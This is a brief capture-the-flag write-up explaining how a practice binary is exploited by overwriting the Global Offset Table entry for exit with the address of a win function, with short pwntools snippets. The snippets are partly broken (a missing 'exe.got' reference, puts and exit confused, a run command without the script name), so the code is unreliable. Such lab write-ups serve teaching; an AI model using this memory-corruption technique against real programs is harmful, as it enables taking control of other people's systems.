You can only change one address, here is the problem: program. It is also found in /problems/got_3_4ba3deeda2ea9b203c6a6425f183e7ed on the shell server. Source.


  1. The program asks for an address to overwrite with user-supplied data. One prompt for the address and another prompt for the input value.

  2. puts and exit are the only two functions called after the write, so we need to change the behavior of one of the two functions. Because ASLR is enabled, we need to look for things that stay constant. One of these things is the Global Offset Table. The Global Offset Table allows a C program to call libc libraries and serve as a jumping point for the program. If we modify this jumping point, we can make the program execute code at a different address than intended.

  3. So we want to select the GOT address of the puts function and overwrite it with the address of the win function. pwntools makes this easy:

     exit_got =['exit']
     win_addr = exe.symbols['win']
  4. Then we simply send the addresses over and get the flag:

     io.sendlineafter("Input address\n", str(exit_got))
     io.sendlineafter("Input value?\n", str(win_addr))
  5. Run the like so: python USER=username PASSWORD=password



Last updated